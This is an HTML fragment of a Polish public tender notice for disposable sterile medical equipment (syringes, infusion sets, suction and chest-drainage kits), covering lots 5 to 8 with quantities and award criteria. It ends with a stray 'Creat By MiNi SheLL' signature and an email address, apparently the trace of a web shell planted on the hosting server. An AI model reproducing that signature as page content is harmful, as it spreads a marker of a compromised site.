9	Strzykawka dwuczęściowa 20ml. Luer jednorazowego użytku z mlecznym tłokiem do łatwiejszego odczytu wypełnionej strzykawki, nie zawierająca lateksu, czarną widoczną skalą, wykonanie               kopolimer etylenowo-propylenowy. Z rozszerzoną skalą . a            100szt.	80	szt.
10	Strzykawka 3-częściowa 10ml, kontrastujący tłok, na strzykawce logo producenta, czytelna skala co 0,2ml, przedłużona o min. 10%, luer-lock Sterylna, op. folia/papier (op. zbiorcze =100szt.)	2	szt.
11	Strzykawka 3-częściowa 20ml, kontrastujący tłok, na strzykawce logo producenta, czytelna skala co 0,5ml, przedłużona o min. 10%, luer-lock. Sterylna, op. folia/papier (op. zbiorcze =50szt.)	2	szt.
12	Strzykawka do insuliny z igłą	1	szt.
13	Strzykawka cewnikowa 50ml	240	szt.
14	Strzykawka do TBC z igłą a 100 szt	3	szt.
15	Strzykawka Janet 100ml 	120	szt.
16	Strzykawka perfuzyjna do pomp 20ml a 100 szt.	1	szt.
17	Strzykawka perfuzyjna do pomp 50 ml bursztynowa 100szt	1	szt.
18	Strzykawka do pomp infuzyjnych 50ml z podwójną skalą	1400	szt.
19	Strzykawka JANET 100 ml z podwójną skalą z dodatkową końcówką wielkości ok 2,5cm ściętą pod kątem 45 st., wyposażona w dodatkową końcówkę w kształcie stożka.	25	szt.
20	Przyrząd do przetaczania płynów infuzyjnych z drenem o dł. min. 150 cm i komorą kroplową o dł. Min. 6 cm, bez łącznika do dodatkowej iniekcji bez igły, j.uż., jałowe, apirogenne, nietoksyczne, sterylizowane tlenkiem etylenu.	7500	szt.
21	Zestaw do szybkiego przetaczania krwi z pompką i filtrem	10	szt.
22	Przyrząd do przetaczania krwi z drenem o dł. min. 150 cm i komorą kroplową o dł. min. 9 cm, bez łącznika do dodatkowej iniekcji bez igły, j.uż., jałowe, apirogenne, nietoksyczne, sterylizowane tlenkiem etylenu.	300	szt.
23	Przyrząd do precyzyjnego przetaczania płynów oraz żywienia z drenem wykonanym z PU, komora kroplowa o długości min 6cm z mikroskraplaczem (60 kropel = 1ml (+-0,1ml), filtr 15?m, regulator przepływu z miejscem do podwieszenia drenu, precyzyjny regulator przepływu w formie beczki w regulacją w zakresie 5-250ml/godz. (podwójna skala dla rozwtorów 10% oraz 40%), dren o długości 150cm z przeźroczystym, obrotowym łącznikiem luer-lock na jego końcu, dodatkowym portem do iniekcji w kształcie litery Y. Opakowanie folia-papier.Dren wolny od PCV oraz DEHP.	2	szt.
24	Przyrząd do przetaczania z możliwością pomiaru OCŻ opakowanie papierowo - foliowe	30	szt.
25	Przyrząd do przetaczania leków światłoczułych	7	szt.
26	Mandryn z zamknięciem luer-lok	50	szt.
27	Dren do tlenu 2,1 m	30	szt.
28	Dren do tlenu 4 m	30	szt.
29	Przedłużacz do pompy infuzyjnej bursztynowy 1,5 m	80	szt.
30	Przedłużacz do pompy infuzyjnej 1,5 m	600	szt.
31	Nożyczki do przecinania zaciskacza jałowe	2	szt.
32	Zaciskacz do pępowiny jałowy	150	szt.
33	Wziernik j.uż. Cusco S,M,L sterylne	150	szt.
34	Pęseta jednorazowego użytku jałowa	12	szt.
35	Cewnik do podawania tlenu przez nos dł. drenu min. 200cm	400	szt.
36	Kranik trójdrożny stosowany w terapii infuzyjnej i transfuzyjnej z optycznym identyfikatorem położenia	400	szt.
37	Kranik trójdrożny z przedłużaczem 7cm,10 cm , 25 cm	100	szt.
Wymagania  Zamawiającego
1. Do oferty należy dołączyć               katalog lub folder producenta w języku polskim, zawierający opis przedmiotu zamówienia  w celu weryfikacji zgodności  oferowanego produktu z opisem przedmiotu zamówienia w SIWZ. 
2. Opakowania jednostkowe wyrobów medycznych muszą zawierać widoczne oznakowanie CE, numer serii, datę ważności oraz znak jednorazowego użycia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.14.00.00-3, 33.17.10.00-9, 33.18.15.20-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostaw CITO - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet nr 5 - Sprzęt medyczny jednorazowy sterylny laryngologiczny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa międzynarodowa	Ilość 	Jedn. miary  
1	Folia PTFE wykonana z politetrafluoroetylenu, obojętna fizjologicznie nie powodująca odczynów alergicznych i nie zmieniająca swoich właściwości pod wpływem temperatury i środowiska rozm.60mmx 40mmx 0,2mm i 40mmx40mmx0,2mm	35	szt
Wymagania  Zamawiającego
1. Do oferty należy dołączyć: katalog lub folder producenta w języku polskim, zawierający opis przedmiotu zamówienia  w celu weryfikacji zgodności  oferowanego produktu z opisem przedmiotu zamówienia w SIWZ. 
2. Opakowania jednostkowe wyrobów medycznych muszą zawierać widoczne oznakowanie CE, numer serii, datę ważności oraz znak jednorazowego użycia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.14.00.00-3, 33.17.10.00-9, 33.18.15.20-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostaw CITO - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet nr 6 - Sprzęt medyczny jednorazowy sterylny 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa międzynarodowa	Ilość 	Jedn. miary  
1	Kuweta Cultera 20ml sterylna	400	szt
2	Zestaw do krwawego pomiaru ciśnienia krwi kompatybilny z monitorem funkcji życiowych Infinity Delta 	2	szt
3	Zestaw do drenażu opłucnej z bezpieczną igłą -Veresa z workiem o pojemności 2000 ml. z strzykawką o pojemności 50/60 ml z kranikiem trójdrożnym 	3	szt
4	Zestaw do nakłuć opłucnej z trzema igłami 14G, 16G, 18G dł. 90mm, worek 2l, zawór jednokierunkowy 	6	szt
5	Zestaw do drenażu opłucnej z zastawką typu Plura-Seal w skład którego wchodzi: poliuretanowy cewnik o rozmiarze 8F/18Ga/19cm, igła z kranikiem trójdrożnym, samozamykająca się zastawka, strzykawka o pojemności 5ml, skalpel. 	1	szt.
6	Zestaw do pobierania wydzielin z drzewa oskrzelowego sterylny opakowanie papierowo - foliowe, próbówka min. 10ml, dodatkowa zakrętka i nalepka identyfikacyjna	40	szt
7	Cewnik do odsysania górnych dróg oddechowych Ch 6-10 dł. 40cm opakowanie papierowo-foliowe	100	szt
8	Cewnik do odsysania górnych dróg oddechowych Ch 12-18 dł. 60cm opakowanie papierowo-foliowe	1700	szt
Wymagania  Zamawiającego
1. Do oferty należy dołączyć: katalog lub folder producenta w języku polskim, zawierający opis przedmiotu zamówienia  w celu weryfikacji zgodności  oferowanego produktu z opisem przedmiotu zamówienia w SIWZ. 
2. Opakowania jednostkowe wyrobów medycznych muszą zawierać widoczne oznakowanie CE, numer serii, datę ważności oraz znak jednorazowego użycia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.14.00.00-3, 33.17.10.00-9, 33.18.15.20-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostaw CITO - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pakiet nr 7 - Sprzęt medyczny jednorazowy sterylny 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa międzynarodowa	Ilość 	Jedn. miary  
1	Zestaw do odsysania pola operacyjnego z rączką zakończony kulką, dren z możliwością przycięcia łącznika w specjalnie oznaczonych miejscach i dopasowania do różnego typu ssaków, wzmacniany wzdłużnie, bez kontroli odsysania, długość 300 - 400 cm, podwójnie pakowane	15	szt
2	Zestaw do odsysania pola operacyjnego z rączką zakończony kulką, dren z możliwością przycięcia łącznika w specjalnie oznaczonych miejscach i dopasowania do różnego typu ssaków, wzmacniany wzdłużnie,z kontrolą odsysania, długość 300 - 400 cm, podwójnie pakowane	2	szt
3	Zestaw do odsysania pola operacyjnego Yankauer bez kulki, dren z możliwością przycięcia łącznika w specjalnie oznaczonych miejscachi dopasowania do różnego typu ssaków, wzcacniany wzdłużnie, bez kontroli odsysania, długość 300 - 400 cm, podwójnie pakowane	140	szt
4	Zestaw do odsysania pola operacyjnego Yankauer bez kulki , dren z możliwością przycięcia łącznika w specjalnie oznaczonych miejscach i dopasowania do różnego typu ssaków, wzmacniany wzdłużnie, z kontrolą odsysania, długość 300 - 400 cm, podwójnie pakowane	50	szt
5	Zestaw do odsysania pola operacyjnego Yankauer bez kontroli odsysania z końcówką standard	15	szt
6	Zestaw do odsysania pola operacyjnego typu OP FLEX SUPER Flow bez kulki, bez kontroli odsysania, długość min.200cm, podwójnie pakowane	1	szt
7	Dren do ssaka min.300cm	40	szt
8	Końcówka do odsysania pola operacyjnego bez kontroli odsysania, Ch 22 - 30	8	szt.
9	Końcówka do odsysania pola operacyjnego z kontrolą odsysania, Ch22 - Ch30	15	szt
10	Końcówka do odsysania pola operacyjnego z kulką, bez kontroli odsysania, Ch 22 - 30	7	szt
11	Dren ULMERA Ch10-Ch18 ze znacznikiem RTG dł. min.70 cm	4	szt.
12	Igła do biopsji tnącej tkanek miękkich z regulowaną długością cięcia rozm.14G-10cm; 14G-12cm; 14G-20 cm; 18G-10cm: 18G-12cm; 18G-20cm 	1	szt
13	Końcówka do odsysania pola operacyjnego z kulką, z kontrolą odsysania, Ch22 - Ch30	2	szt
14	Dren REDONA z trokarem stalowym Ch10-Ch18 ze znacznikiem RTG dł. min.150 cm	4	szt.
15	Zestaw do diagnostycznego płukania otrzewnej typu PERITOFIX zawierający: 1) trokar punkcyjny CH 10, z regulowaną głębokością wkłucia, składa się z metalowego mandrynu oraz kaniuli z tworzywa, 2) cewnik CH 9/50cm wykonany z poliuretanu, zamknięty koniec, boczne otwory, 3) kororowe oznaczenie długości, skalpel do nacięcia skóry	1	szt
16	Zestaw do kontrolowanej zbiórki stolca składający się z oznakowanej 45ml strzykawki, miękkiego i ealstycznego rękawa odprowadzająceo zawierającego kolorowy port irygacji, rękaw z jednej strony zakończony miękkim niskociśnieniowym balonikiem, z drugiej zamkniętym workiem zbiorczym. Zestaw posiada sygnalizator wypełnienia balonika, filtr węglowy oraz barwną kieszonkę na palec.	1	szt
17	Worki kompatybilne do zestawu odprowadzającego płynny stolec, op.10szt	1	op.
Wymagania  Zamawiającego
1. Do oferty należy dołączyć: katalog lub folder producenta w języku polskim, zawierający opis przedmiotu zamówienia  w celu weryfikacji zgodności  oferowanego produktu z opisem przedmiotu zamówienia w SIWZ. 
2. Opakowania jednostkowe wyrobów medycznych muszą zawierać widoczne oznakowanie CE, numer serii, datę ważności oraz znak jednorazowego użycia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.14.00.00-3, 33.17.10.00-9, 33.18.15.20-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostaw CITO - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pakiet nr 8 - Sprzęt medyczny jednorazowy sterylny 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa międzynarodowa	Ilość 	Jedn. miary  
1	Dwukomorowy sterylny zestaw do drenażu klatki piersiowej z wydzieloną komorą zastawki wodnej, komorą na wydzielinę o pojemności  3000 ml, komorę. Zestaw musi posiadać                    specjalny, zabezpieczony port igłowy, umożliwiający pobieranie świeżo zdrenowanego płynu do badań możliwość podłączenia i współpracy z przenośną próżnią. Budowa kompaktowa o wysokości maksymalnej 25 cm, o stabilnej podstawie, z uchwytem umożliwiającym przenoszenie lub powieszenie. Dren łączący bezlateksowy zabezpieczony przed zagięciem metalową sprężyną z zatyczką. Wszystkie elementy w jednym sterylnym opakowaniu  razem z serwetą.	1	szt
2	Wielokomorowy, sterylny zestaw do drenażu klatki piersiowej posiadający wydzieloną komorę zastawki podwodnej z barwnikiem, komorę na wydzielinę o pojemności min.2200 ml,  wydzieloną wodną komorę regulacji siły ssania z barwnikiem, samouszczelniającym portem igłowym, posiadający automatyczną zastawkę zabezpieczającą przed wysokim dodatnim ciśnieniem oraz mechaniczną zastawkę zabezpieczającą przed wysokim ciśnieniem ujemnym z filtrem. Zestaw z samouszczelniającym portem igłowym do pobierania próbek drenowanego płynu tuż przy drenie łączącym. Możliwość wyciszenia bez ingerencji w system centralnej próżni oraz autoregulacja intensywności bąblowania. Zestaw o budowie kompaktowej, o stabilnej podstawie i wysokości maksymalnej 25cm, z uchwytem umożliwiającym przenoszenie lub powieszenie, z dwoma niezależnymi drenami łączącym bezlateksowymi zabezpieczonymi przed zagięciem metalowymi sprężynami.Wszystkie elementy w jednym sterylnym opakowaniu razem z serwetą	1	szt
3	Dren z trokarem typu trójgraniec, wykonany z termoplastycznego PCV, z linią widoczną w RTG, ze znacznikami głębokości co 2 cm, z oznaczeniem rozmiaru na drenie i płaskim uchwycie trokara, z zabezpieczeniem przed uszkodzeniem opakowania przez trokar, rozm. Ch 28F, 32F sterylny	4	szt
	Wymagania  Zamawiającego
1. Do oferty należy dołączyć                    katalog lub folder producenta w języku polskim, zawierający opis przedmiotu zamówienia  w celu weryfikacji zgodności  oferowanego produktu z opisem przedmiotu zamówienia w SIWZ. 
2.  Opakowania jednostkowe wyrobów medycznych muszą zawierać widoczne oznakowanie CE, numer serii, datę ważności oraz znak jednorazowego użycia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.14.00.00-3, 33.17.10.00-9, 33.18.15.20-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostaw CITO - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com